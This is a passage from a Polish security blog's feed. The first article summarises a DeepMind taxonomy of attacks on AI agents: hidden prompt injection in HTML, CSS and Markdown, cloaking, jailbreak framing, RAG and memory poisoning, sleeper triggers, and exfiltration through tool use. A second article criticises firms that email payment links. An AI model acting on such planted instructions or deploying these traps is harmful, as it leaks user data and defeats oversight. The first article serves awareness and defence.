							<uri>https://niebezpiecznik.pl</uri>
						</author>

		<title type="html"><![CDATA[Jak można wykiwać Twoje agenty AI oraz boty AI kradnące treści z Twojej strony?]]></title>
		<link href="https://niebezpiecznik.pl/post/ataki-na-agenty-ai-boty-ai-scrapery-ai/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26986</id>
		<updated>2026-04-07T09:45:28Z</updated>
		<published>2026-04-07T09:43:18Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="AI"/><category scheme="https://niebezpiecznik.pl" term="badania"/><category scheme="https://niebezpiecznik.pl" term="Content Injection"/><category scheme="https://niebezpiecznik.pl" term="jailbreak"/><category scheme="https://niebezpiecznik.pl" term="prompt injection"/><category scheme="https://niebezpiecznik.pl" term="Semantic Manipulation"/><category scheme="https://niebezpiecznik.pl" term="sztuczna inteligencja"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/ataki-na-agenty-ai-boty-ai-scrapery-ai/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/ai-agent-risks-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Wstrzykiwanie wrogich, czyli zapętlonych hiperlinkami miałkich treści, które mają zapchać i ogłupić AI, to tylko jeden ze sposobów oszukiwania agentów AI wchodzących na strony internetowe. Oczywiście treści te nie są widzialne dla zwykłych użytkowników. A jakie są inne sposoby wystrychiwania AI na dudka? I czy mogą one wpływać tylko na konkretne agenty? Próbę stworzenia klasyfikacji [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/ataki-na-agenty-ai-boty-ai-scrapery-ai/"><![CDATA[<p>Wstrzykiwanie wrogich, czyli zapętlonych hiperlinkami miałkich treści, które mają zapchać i ogłupić AI, to tylko jeden ze sposobów oszukiwania agentów AI wchodzących na strony internetowe. Oczywiście treści te nie są widzialne dla zwykłych użytkowników. A jakie są inne sposoby wystrychiwania AI na dudka? I czy mogą one wpływać tylko na konkretne agenty? Próbę stworzenia klasyfikacji &#8220;pułapek na AI&#8221; podjęli badacze z Google DeepMind.<span id="more-26986"></span></p>
<h3>&#8220;Ić stont bocie!&#8221;</h3>
<p>Nie od dziś wiadomo, że <a href="https://niebezpiecznik.pl/post/twoj-agent-ai-moze-ukrasc-dane-lub-nabrac-sie-na-phishing-i-co-teraz/">agenty AI da się zmanipulować</a>. Można ukrywać niebezpieczne polecenia dla AI w instrukcjach formatowania Markdown albo LaTeX (tzw. (indirect) prompt injection). Można też zatruwać wiedzę w systemach RAG albo tworzyć tzw. pułapki przeciążeniowe. Co jakiś czas trafiamy na publikacje dotyczące takich rzeczy i czasami mają one charakter zaledwie ciekawostki i o takich piszemy tylko <a href="https://x.com/niebezpiecznik" target="_blank">na naszym Twitterze</a> &#8212; w ogóle to tam publikujemy najwięcej i najczęściej, umieszczamy tam treści, których nie znajdziecie na żadnym innym naszym kanale w social mediach &#8212; więc <a href="https://x.com/niebezpiecznik" target="_blank">dodajcie nas do obserwowanych na Twitterze</a>). Ale innym razem obserwacje z tego tematu dotykają naprawdę poważnych zagrożeń. </p>
<p>Piątka badaczy z Google DeepMind podjęła próbę stworzenia klasyfikacji <a href="https://papers.ssrn.com/sol3/papers.cfm?abstract_id=6372438">Pułapek na Agenty AI (AI Agent Traps)</a>. Klasyfikacja bazuje na funkcjach agentów AI, w które wymierzone są ataki. Sami badacze podkreślają, że klasyfikacja doskonała nie jest, gdyż prawdziwe ataki mogą wykorzystywać wiele mechanizmów jednocześnie. Badacze zaproponowali podział pułapek na <strong>6 kategorii</strong>, które opisujemy poniżej.</p>
<div class="info">
<h3>Co każdy pracownik powinien wiedzieć o AI?</h3>
<ul>
<li>Czy korzystanie z AI w firmie stanowi <strong>zagrożenie</strong>? </li>
<li>Czy pracownicy powinni obawiać się ataków &#8220;<strong>deepfejkiem na prezesa</strong>&#8220;? </li>
<li>Czy księgowa powinna <strong>dovibecodować</strong> sobie brakujące funkcje do Excela? </li>
<li>Do jakich służbowych zadań <strong>nigdy nie wolno użyć AI</strong>, a jakie wręcz należy AI powierzyć?</li>
</ul>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/AI_lecture.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/AI_lecture-321x250.jpg" alt="" width="321" height="250" class="aligncenter size-medium wp-image-26992" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/AI_lecture-321x250.jpg 321w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/AI_lecture-600x467.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/AI_lecture-768x598.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/AI_lecture.jpg 786w" sizes="auto, (max-width: 321px) 100vw, 321px" /></a></p>
<p>Dokładnie o tym od 2 lat opowiadamy podczas <a href="https://niebezpiecznik.pl/post/zapros-niebezpiecznika-do-swojej-firmy/" target="_blank">wykładów realizowanych dla polskich i zagranicznych spółek</a>. Konkretnie, <strong>merytorycznie</strong> i bez hajpu, ale z humorem i <strong>przykładami konkretnych narzędzi i zastosowań AI</strong> &#8212; tych dobrych i tych złych. Jeśli chcesz zaktualizować wiedzę swoich (współ)pracowników w temacie AI (zarówno ryzyk, zagrożeń jak i korzyści oraz benefitów), to zaproś nas do swojej firmy. W godzinę otworzymy Wam oczy i gwarantujemy, że niektórzy uczestnicy wykłady nie będą chcieli ich zamknąć ich przez najbliższe tygodnie (lub do wyczerpania przysługujących im tokenów/limitów na AI, cokolwiek nastąpi wcześniej :). Aby otrzymać agendę wykładu, napisz na <a href="mailto:szkolenia.ai@niebezpiecznik.pl" target="_blank">szkolenia.ai@niebezpiecznik.pl</a> lub zadzwoń <strong>12-44-202-44</strong>.</div>
<h3>Content Injection Traps (wstrzykiwanie treści)</h3>
<p>W rozumieniu badaczy jest to „atak na percepcję” agentów. Do tej grupy &#8220;pułapek&#8221; zaliczamy osadzanie poleceń dla AI np. wewnątrz kodu CSS lub w komentarzach HTML (badacze użyli tu terminu Web-Standard Obfuscation). Również do tej grupy zaliczono wykorzystywanie składni języków formatowania (np. Markdown czy LaTeX-a) w celu przemycenia złośliwych instrukcji (tzw. <strong>Syntactic Masking</strong>). Takie rzeczy są zazwyczaj niewidoczne dla ludzi, ale mogą być parsowane i przetwarzane przez agenty AI.</p>
<div id="attachment_26993" style="width: 360px" class="wp-caption aligncenter"><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/ai-injection-2025.jpg"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-26993" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/ai-injection-2025-350x146.jpg" alt="" width="350" height="146" class="size-medium wp-image-26993" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/ai-injection-2025-350x146.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/ai-injection-2025-600x250.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/ai-injection-2025-768x320.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/ai-injection-2025-1536x641.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/ai-injection-2025.jpg 1572w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a><p id="caption-attachment-26993" class="wp-caption-text">Jeden ze starszych, ale dobrze wizualizujących tę technikę przykładów.</p></div>
<p>Do ataków na percepcję zaliczono też użycie steganografii w celu ukrycia złośliwego komunikatu oraz tzw. <strong>Dynamic Cloaking</strong>, czyli wykrywanie, że odwiedzającym jest agent AI i warunkowe wstrzykiwanie szkodliwych treści, których zwykli użytkownicy nie zobaczą.</p>
<h3>Semantic Manipulation Traps (manipulacje semantyczne)</h3>
<p>To ataki, które są wycelowane w &#8220;rozumowanie&#8221; agenta. Chodzi o manipulowanie informacjami syntetyzowanymi przez agenty w celu skłonienia ich do sformułowania wniosków zgodnych z celami napastnika. Do tej grupy &#8220;pułapek&#8221; zaliczamy m.in. wypełnianie tekstu źródłowego starannie dobranym, w określony sposób nacechowanym emocjonalnie albo stronniczym językiem. Wówczas u modeli LLM pojawiają się błędy poznawcze podobne do ludzkich. Inne pułapki z tej kategorii obejmują opakowywanie złośliwych instrukcji w ramy edukacyjne lub hipotetyczne w celu ominięcia filtrów (np. &#8220;powiedz mi jak zrobić [TU WSTAW ZAKAZANĄ RZECZ], abym tego nie powtarzał&#8221;).</p>
<h3>Cognitive State Traps (zatruwanie wiedzy/pamięci)</h3>
<p>To ataki, które są wycelowane w &#8220;uczenie się&#8221; i pamięć agenta, czyli m.in. zatruwanie wiedzy (knowledge poisoning) w systemach RAG (Retrieval-Augmented Generation). Zjawisko to wykorzystuje fakt, że systemy RAG ufają dokumentom zewnętrznym bardziej niż własnej wiedzy wyuczonej, więc jeśli napastnik &#8220;zatruje&#8221; bazę danych (np. wewnętrzne repozytorium firmy), <strong>model zacytuje kłamstwo jako źródło prawdy</strong>. W praktyce osoby o złych intencjach mogą dokonać wstrzyknięcia danych do źródeł AI poprzez publikowanie wrogich treści w publicznych zasobach internetowych (np. Reddit), które są celem robotów indeksujących (<i data-path-to-node="1" data-index-in-node="169">scrapers</i>), lub poprzez przesyłanie &#8220;zatrutych&#8221; plików do współdzielonych repozytoriów korporacyjnych, które agent automatycznie indeksuje.</p>
<p>Do tej samej grupy pułapek badacze zaliczyli <strong>Latent Memory Poisoning</strong>, czyli <a href="https://niebezpiecznik.pl/post/wstrzykneli-backdoor-do-ai/">ataki z uśpionym agentem</a>. Dane wstrzyknięte do pamięci długotrwałej agenta mogą wyglądać normalnie, dopóki nie pojawi się specyficzny wyzwalacz (trigger). Wtedy model &#8220;przypomina sobie&#8221;, że jest zły i zaczyna działać na korzyść atakujących. Kolejny rodzaj ataków w tej grupie to <strong>Contextual Learning Traps</strong>. Chodzi o wykorzystanie zdolności modeli do nauki na przykładach podanych w zapytaniu (few-shot learning). Napastnik podaje kilka przykładów poprawnych interakcji, które są subtelnie skrzywione, a model zaczyna powielać błędy lub stronniczość.</p>
<h3>Behavioural Control Traps</h3>
<p>To ataki, które są wycelowane w działanie agenta, m.in. tzw. osadzone sekwencje jailbreak (<strong>Embedded Jailbreak Sequences</strong>). Samo słowo <i data-path-to-node="1" data-index-in-node="197">Jailbreaking</i> w kontekście LLM odnosi się zazwyczaj do &#8220;wrogich&#8221; danych wejściowych, które mają ominąć mechanizmy dopasowania bezpieczeństwa. Jednak jailbreaking &#8220;osadzony&#8221; polega na ukryciu sekwencji w zasobach zewnętrznych, które agent konsumuje podczas normalnej pracy. Znów jest to więc coś na kształt indirect prompt injection. W momencie pobrania polecenie trafia do okna kontekstowego agenta, skutecznie nadpisując jego mechanizmy bezpieczeństwa w celu wprowadzenia go w stan pozbawiony ograniczeń. Do tej grupy pułapek zaliczymy więc polecenia eksfiltracji osadzone <a href="https://niebezpiecznik.pl/post/twoj-agent-ai-moze-ukrasc-dane-lub-nabrac-sie-na-phishing-i-co-teraz/">w wiadomościach e-mail</a> czy w odpowiedziach API. Ataki te mogą również wykorzystywać zdolność agenta do korzystania z narzędzi, np. agent może wysłać e-mailem dane finansowe, medyczne lub behawioralne do napastnika.</p>
<p>Inne pułapki tego typu to – według badaczy – <strong>Sub-agent Spawning Traps</strong>. Polegają one na wykorzystaniu uprawnień (tzw. orchestratora) do tworzenia podagentów kontrolowanych przez napastnika wewnątrz zaufanego przepływu sterowania.</p>
<h3>Systemic Traps (pułapki na systemy)</h3>
<p>Do tej grupy zaliczono ataki, które są wycelowane nie w pojedyncze agenty ale w środowiska łączące wiele agentów. To bardzo ciekawe zagadnienie. Generalnie odnosi się do tego, że złe zachowanie pojedynczego agenta nie jest dużym problemem, ale jeśli wszystkie agenty powtarzają to zachowanie, to mamy duży problem. W tej grupie zagrożeń badacze wyróżnili m.in. <strong>Congestion Traps</strong> (pułapki przeciążeniowe). Wyobraźmy sobie, że nagle wszystkie nawigacje kierują pojazdy w okolicy na jedyną niezakorkowaną drogę. To mniej więcej ten problem. Zdaniem badaczy atakujący mogą to wykorzystać np. nadając specjalnie spreparowany komunikat wywołujący zsynchronizowaną wyprzedaż wśród agentów finansowych.</p>
<p>Inny typ takiej pułapki to <strong>Interdependence Cascades</strong> (kaskada współzależności). Działanie jednego agenta może zmienić środowisko, ale zmiana ta jest następnie postrzegana jako nowy sygnał przez inne agenty, których reakcje jeszcze bardziej modyfikują środowisko. Coś w rodzaju giełdowego zjawiska flash crash ale bez jawnej komunikacji między agentami (<strong>Tacit Collusion traps</strong>). Albo tzw. <strong>Sybil Attacks</strong>, czyli atak polegający na wprowadzeniu do systemu własnych agentów udających zaufane jednostki.</p>
<h3>Human-in-the-Loop Traps (pułapki na człowieka)</h3>
<p>Ostatnia grupa pułapek to ta, która jest wycelowana w ludzkiego nadzorcę systemów AI. Do takich ataków zaliczymy np. podawanie przez AI instrukcji postępowania (np. po ataku ransomware), które to instrukcje bardziej pomogą atakującemu niż ofiarom. Tu jednak badacze podkreślają, że literatury na ten temat jest mało, a zachowania ludzi są wysoce nieprzewidywalne. Zdecydowanie jest to obszar do dalszego badania.</p>
<h3>Mam swojego agenta AI &#8211; co robić, jak żyć?</h3>
<p>Dla zwykłego użytkownika AI powyższa klasyfikacja może być&#8230; ciekawym materiałem do przemyśleń. Dla specjalistów może to być punkt wyjścia do dyskusji o tworzeniu warstw w systemie bezpieczeństwa swoich agentów AI (aby nie dało się zmanipulować). Ten system powinien obejmować zabezpieczenia techniczne, i to różne, bo działające zarówno przy trenowaniu, jak i przy używaniu modeli (skanery treści, monitory wejścia itd.). </p>
<p>Z kolei dla właścicieli różnych zasobów, które agenty AI odwiedzają aby wykonać jakąś czynność (lub po prostu ukraść wiedzę) może to być poradnik, jak agentom zagrać na nosie&#8230; Pytanie jakie się nasuwa, to czy nie potrzebujemy już rozwiązań prawnych, np. w dziedzinie odpowiedzialności finansowej za skutki działania popsutego agenta? W pewnym sensie artykuł Google DeepMind stawia więcej pytań niż odpowiedzi, ale to właśnie dobrych pytań możemy teraz bardzo potrzebować&#8230;</p>
<p>PS. Potrzebujesz przeszkolić swoich (współ)pracowników z bezpiecznego i sensownego korzystania z narzędzi AI? Mamy dokładnie takie szkolenie! Napisz do nas na <a href="mailto:szkolenia.ai@niebezpiecznik.pl" target="_blank">szkolenia.ai@niebezpiecznik.pl</a> lub zadzwoń <strong>12-44-202-44</strong> aby otrzymać jego  agendę.</p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/ataki-na-agenty-ai-boty-ai-scrapery-ai/#comments" rel="replies" thr:count="16" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/ataki-na-agenty-ai-boty-ai-scrapery-ai/feed/atom/" rel="replies" thr:count="16" type="application/atom+xml"/>
			<thr:total>16</thr:total>
			</entry>
		<entry>
		<author>
			<name>Marcin Maj</name>
							<uri>https://niebezpiecznik.pl</uri>
						</author>

		<title type="html"><![CDATA[Duże firmy przyuczają ludzi do phishingu (po tym jak przed nim ostrzegały)]]></title>
		<link href="https://niebezpiecznik.pl/post/duze-firmy-przyuczaja-ludzi-do-phishingu-po-tym-jak-przed-nim-ostrzegaly/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26831</id>
		<updated>2026-04-02T11:36:42Z</updated>
		<published>2026-04-02T11:36:42Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="Luxmed"/><category scheme="https://niebezpiecznik.pl" term="PGNiG"/><category scheme="https://niebezpiecznik.pl" term="phishing"/><category scheme="https://niebezpiecznik.pl" term="socjotechnika"/><category scheme="https://niebezpiecznik.pl" term="Vectra"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/duze-firmy-przyuczaja-ludzi-do-phishingu-po-tym-jak-przed-nim-ostrzegaly/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/01/luxmed-mail-150x150.png" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Co łączy dostawcę gazu, firmę telekomunikacyjną i centrum medyczne? Takie firmy wysyłają do swoich klientów maile z linkami do płatności. Niestety nie służy budowaniu dobrych nawyków w przeciwdziałaniu phishingowi. Niewiele też wskazuje na to, aby to się miało zmienić. Problem linków w e-mailach To jest na swój sposób fascynujące. Firmy płacą za szkolenia z bezpieczeństwa. [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/duze-firmy-przyuczaja-ludzi-do-phishingu-po-tym-jak-przed-nim-ostrzegaly/"><![CDATA[<p>Co łączy dostawcę gazu, firmę telekomunikacyjną i centrum medyczne? Takie firmy wysyłają do swoich klientów maile z linkami do płatności. Niestety nie służy budowaniu dobrych nawyków w przeciwdziałaniu phishingowi. Niewiele też wskazuje na to, aby to się miało zmienić.<span id="more-26831"></span></p>
<h3>Problem linków w e-mailach</h3>
<p>To jest na swój sposób fascynujące. Firmy płacą za szkolenia z bezpieczeństwa. Banki prowadzą kampanie edukacyjne przeciwko phishingowi. Nawet państwo inwestuje w materiały edukacyjne, które mają wszystkich obywateli nauczyć jednego &#8212; <strong> nie wpisuj hasła w formularzu logowania, jeśli na stronę trafiłeś przez kliknięcie w link z e-maila.</strong>. Edukacja w tym zakresie jest prowadzona od wielu lat, bo to jedno z najstarszych i najczęstszych oszustw internetowych. A jednocześnie najbardziej skutecznych. </p>
<ul>
<li>Bo ludzie nie zawsze potrafią zorientować się, że e-mail nie pochodzi od tego, za kogo podaje się nadawca. </li>
<li>Bo ludzie nie potrafią też zauważyć literówki na pasku adresowym przeglądarki (lub w ogóle na niego nie patrzą) po kliknięciu w linka z e-maila.</li>
</ul>
<p>Wszystkim byłoby łatwiej, gdybyśmy materiałach edukacyjnych mogli napisać coś w stylu </p>
<blockquote><p>&#8220;żadna uczciwa firma nie będzie Cię zachęcać w e-mailu do logowania (lub płatności) przez kliknięcie w link&#8221;</p></blockquote>
<p>Dobre praktyki rynkowe są stosowane przez niektórych &#8212; zwróćcie uwagę jak w tym zakresie wygląda komunikacja od banków. W e-mailach jest najcześciej zwrot typu &#8220;zaloguj się na swoje konto, potem przejdź na zakładkę X aby aktywować Y&#8221;, <strong>ale bez linka</strong>. Klient przecież wie (powinien wiedzieć) jak się zalogować do usługi z której korzysta, a brak linka skłania go do samodzielnego wpisania adresu strony internetowej lub uruchomienia aplikacji. Tak, może ją wpisać z literówką. Tak, może ją wygooglać i trafić na lewą stronę. Ale te ryzyka nie prowadzą do tylu ofiar co phishing i można je szczelniej kontrolować, niż przyzwyczajenie klienta do &#8220;klikam w każdy link i wpisuję dane&#8221;.</p>
<p>Nie wiemy ile firm zachęca w swojej komunikacji do klikania w linki z e-maila prowadzące do logowania lub płatności, ale sami natknęliśmy się w ostatnim czasie na trzy przykłady.</p>
<div class="info">
Zagrożeń czyhających na internautów jest zdecydowanie więcej. O wszystkich opowiadamy w trakcie 3-godzinnego wykładu &#8220;<a href="https://niebezpiecznik.pl/wyklad" target="_blank">Jak nie dać się zhackować?</a>&#8220;. To nasz najlepszy wykład o cyberbezpieczeństwie dla każdego. Średnia ocena: 9,48/10. A oto terminy najbliższych wykładów: </p>
<ul>
		<!-- li><a href="https://nbzp.cz/jnsz-kra2510" target="_blank">KRAKOW <small>(weekend)</small> 4 października -- zapisz się tutaj!</a></li-->
		<li><a href="https://nbzp.cz/jnsz-wro2606" target="_blank">WROCŁAW, 11 czerwca -- zapisz się tutaj!</a></li>
                <li><a href="https://nbzp.cz/jnsz-poz2610" target="_blank">POZNAŃ, 8 października -- zapisz się tutaj!</a></li>
                <li><a href="https://nbzp.cz/jnsz-lod2610" target="_blank">ŁÓDŹ, 22 października -- zapisz się tutaj!</a></li>
                <li><a href="https://nbzp.cz/jnsz-gda2611" target="_blank">GDAŃSK, 19 listopada -- zapisz się tutaj!</a></li>
</ul>
<p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f449.png" alt="👉" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <a href="https://bilety.niebezpiecznik.pl/" target="_blank">Zobacz pełną agendę tego wykładu i reakcje uczestników poprzednich edycji</a>. </p>
<p>PS. Można (a nawet powinno się) na ten wykład wysłać lub przyjść z nietechnicznymi znajomymi!
</p></div>
<h3>Lux Med</h3>
<p>Przypadek numer 1: Grupa Lux Med. Osoby, które zarejestrowały się na wizytę lekarską w zakładzie tej firmy otrzymywały takiego oto maila z potwierdzeniem.</p>
<div id="attachment_26833" style="width: 596px" class="wp-caption aligncenter"><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/01/luxmed-mail.png"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-26833" class="size-large wp-image-26833" src="https://niebezpiecznik.pl/wp-content/uploads/2026/01/luxmed-mail-586x600.png" alt="" width="586" height="600" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/01/luxmed-mail-586x600.png 586w, https://niebezpiecznik.pl/wp-content/uploads/2026/01/luxmed-mail-244x250.png 244w, https://niebezpiecznik.pl/wp-content/uploads/2026/01/luxmed-mail.png 719w" sizes="auto, (max-width: 586px) 100vw, 586px" /></a><p id="caption-attachment-26833" class="wp-caption-text">E-mail z Luxmed (wbrew pozorom nie scam)</p></div>
<p>Kliknięcie w link w e-mailu przekierowuje na stronę Luxmedu, która z kolei przekierowuje do bramki płatności PayU. Schemat wykorzystywany w wielu oszustwach internetowych &#8220;na dopłatę&#8221;.</p>
<p>Drugi przypadek: Vectra &#8211; dostawca internetu i innych usług telekomunikacyjnych. Klienci tej firmy po wystawieniu rachunku mogą otrzymać taki e-mail:</p>
<div id="attachment_26834" style="width: 572px" class="wp-caption aligncenter"><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/01/vectra-mail.png"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-26834" class="size-large wp-image-26834" src="https://niebezpiecznik.pl/wp-content/uploads/2026/01/vectra-mail-562x600.png" alt="" width="562" height="600" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/01/vectra-mail-562x600.png 562w, https://niebezpiecznik.pl/wp-content/uploads/2026/01/vectra-mail-234x250.png 234w, https://niebezpiecznik.pl/wp-content/uploads/2026/01/vectra-mail.png 688w" sizes="auto, (max-width: 562px) 100vw, 562px" /></a><p id="caption-attachment-26834" class="wp-caption-text">Mail od Vectry</p></div>
<p>Link w mailu kieruje do eBok, a zaraz potem następuję przekierowanie do płatności. </p>
<p>Trzeci przypadek: PGNiG (Grupa Orlen). Ta firma w przeszłości <a href="https://pgnig.pl/aktualnosci/-/news-list/id/uwaga-na-falszywe-wiadomosci-email-podszywajace-sie-pod-pgnig-obrot-detaliczny-sp-z-o-o-/newsGroupId/10184">ostrzegała przed phishingiem</a>, ale jak widać poniżej, trochę &#8220;przyucza&#8221; do niego swoich klientów.</p>
<div id="attachment_26835" style="width: 539px" class="wp-caption aligncenter"><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/01/pgnig-mail.png"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-26835" class="size-large wp-image-26835" src="https://niebezpiecznik.pl/wp-content/uploads/2026/01/pgnig-mail-529x600.png" alt="" width="529" height="600" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/01/pgnig-mail-529x600.png 529w, https://niebezpiecznik.pl/wp-content/uploads/2026/01/pgnig-mail-220x250.png 220w, https://niebezpiecznik.pl/wp-content/uploads/2026/01/pgnig-mail.png 549w" sizes="auto, (max-width: 529px) 100vw, 529px" /></a><p id="caption-attachment-26835" class="wp-caption-text">Mail od PGNIG</p></div>
<p>Link w mailu ma treść &#8220;Zapłać online&#8221; co sugeruje przejście od razu do płatności, jednak tu również klient najpierw przekierowany jest do eBOK, potem może przeklikać się do opcji płacenia. Dodajmy, że wyłudzenie dostępu do konta w takim eBOK też miałoby swoją wartość. Są tam dane o punktach poboru, poprzednich fakturach itd.</p>
<p>Wszystkie trzy podmioty odpytaliśmy o tę sprawę i zadaliśmy im kluczowe pytanie. Czy bylibyście Państwo skłonni zmienić te praktyki?</p>
<h3>Vectra: &#8220;Tak&#8230; ale&#8230; tego się nie da tak szybko zmienić&#8230;&#8221;</h3>
<p>Vectra po otrzymaniu pytań odpisała nam dwukrotnie. Najpierw zapewniono nas, że problem jest istotny i będzie analizowany. Potem dostaliśmy drugą, właściwą odpowiedź.</p>
<blockquote><p>Dzień dobry Panie Marcinie<br />
bezpieczeństwo cyfrowe naszych klientów jest dla nas niezwykle istotne i traktujemy je z najwyższą powagą. Spółka ustawicznie pracuje nad rozwijaniem różnorodnych, wielopłaszczyznowych elementów bezpieczeństwa, w tym dedykowanych dla Abonentów. Zgadzamy się, że należy podejmować wszelkie możliwe działania, by jak najskuteczniej eliminować zagrożenia, jakie niesie za sobą phishing, w szczególności ten w zakresie nieufania jakimkolwiek linkom zawartym w korespondencji. Jesteśmy świadomi zagrożeń i dlatego edukujemy stale w tych kwestiach zarówno naszych Klientów jak i pracowników oraz kontrahentów.<br />
Korespondencję masową, do której odniósł Pan swoje uwagi, charakteryzuje długi okres wdrażania nowych rozwiązań. Wynika to choćby z konieczności w tym zmiany dotychczasowych przyzwyczajeń w zakresie korzystania z wdrożonych udogodnień przez Abonentów i użytkowników, czy wyjaśniana przyczyn wprowadzanych zmian. Kluczowe w tym procesie jest także dostosowywanie się do percepcji i zgłaszanych potrzeb Klientów, które wynikają z ich różnego poziomu świadomości i umiejętności w korzystania z usług cyfrowych.<br />
<strong>W odniesieniu do podniesionej przez Pana kwestii eliminowania akcji odnośników, systematycznie ograniczamy ich liczbę i dążymy do pełnej ich eliminacji.</strong> Równolegle promujemy nasze systemy eBok, które stanowią bezpieczny i alternatywny, w tym zabezpieczony przez 2FA, kanał komunikacji, także dla korespondencji elektronicznej (e-mail).<br />
<strong>Podkreślamy, że nasze działania w obszarze zmian w komunikacji masowej muszą być wdrażane rozważnie i muszą adresować potrzeby naszych klientów.</strong> Nie możemy nikogo wykluczać z możliwości i korzyści, jakie dają usługi cyfrowe.<br />
Z pozdrowieniami<br />
Biuro prasowe Vectry</p></blockquote>
<p>Czyli &#8211; jak rozumiemy &#8211; niektórzy ludzie bez linka nie ogarną płatności i dlatego te linki są&#8230; systematycznie eliminowane. Bardzo cieszy nas fakt, że Vectra rozumie problem, ale jednocześnie mamy wrażenie, że nie w pełni.</p>
<h3>PGNIG: &#8220;To link do eBOK więc nie ma problemu!&#8221;</h3>
<p>PGNIG też nam odpowiedziało.</p>
<blockquote><p>Szanowny Panie Redaktorze,<br />
w PGNiG Obrót Detaliczny, Grupa ORLEN, dbamy o bezpieczeństwo klientów, w szczególności w obszarze usług cyfrowych. W ramach konsekwentnie realizowanej strategii chronimy dane oraz wspieramy klientów w bezpiecznym korzystaniu z oferowanych rozwiązań, m.in. poprzez informację i edukację (przykładem mogą być publikacje na naszej stronie internetowej: Ostrzeżenie przed fałszywymi mailami | PGNiG OD).<br />
<strong>Po Pana zgłoszeniu dokonaliśmy ponownej analizy naszej korespondencji z klientami. Wynika z niej, że w żadnym z szablonów wiadomości nie ma linków prowadzących do bezpośredniej płatności. Zamieszczone w nich odnośniki kierują do konkretnych procesów serwisu samoobsługowego eBOK i wymagają autoryzacji poprzez zalogowanie.</strong><br />
Mamy jednak świadomość, że dotychczasowy opis działania „zapłać on-line” mógł wprowadzać w błąd, sugerując niektórym użytkownikom, że link przekierowuje bezpośrednio do tzw. bramki płatniczej. W związku z tym dokonaliśmy korekty opisu na „zaloguj i zapłać”, wskazując jednoznacznie, że cały proces uzyskania wcześniejszego dostępu do systemu PGNiG Obrót Detaliczny.<br />
Serdecznie dziękujemy za Pana zgłoszenie, które przyczyniło się do zmiany, którą wdrożyliśmy.<br />
W razie pytań pozostaje do Pana dyspozycji.</p></blockquote>
<p>Zadaliśmy spółce dodatkowe pytania starając się delikatnie wyjaśnić, że zamieszczanie w mailu linka do jakiejkolwiek strony logowania nie jest najlepszym pomysłem. Do momentu pisania tego tekstu nie otrzymaliśmy żadnych dodatkowych odpowiedzi.</p>
<h3>Luxmed: Prowadzimy prace &#8220;na rzecz wprowadzenia bezpieczniejszych metod&#8221;</h3>
<p>W imieniu Luxmedu odpowiedział nam Łukasza Niewola, Dyrektor Departament Komunikacji Korporacyjnej i Zrównoważonego Rozwoju. Tu również odpowiedź jest w stylu &#8220;chcielibyśmy coś zmienić, ale jeszcze nie zmieniamy&#8221;.</p>
<blockquote><p>Grupa LUX MED stale udoskonala jakość usług, wprowadzając funkcjonalności dostosowane do potrzeb pacjentów, starając się zachować przy tym najwyższe standardy bezpieczeństwa. Linki do płatności w komunikacji e-mailowej są stosowane w ściśle określonych przypadkach. Przed wysłaniem e-maila z linkiem pacjent jest informowany, że go otrzyma i mam możliwość skorzystania z tej formy płatności. Jednocześnie podkreślamy, że w wiadomościach e-mail potwierdzających rezerwację wizyty, czy przypominających o wizycie nie wysyłamy linków do płatności.<br />
Obecnie trwają zaawansowane prace, które mają na celu wygasić tę formę płatności na rzecz wprowadzenia bezpieczniejszych metod. W najbliższym czasie nasi pacjenci będą mogli dokonać płatności przez Portal Pacjenta LUX MED lub stronę sklep.luxmed.pl.<br />
W zdecydowanej większości płatności za usługi dokonywane są przez naszych pacjentów w centrach medycznych przed wizytami.</p></blockquote>
<h3>Co robić? Jak żyć?</h3>
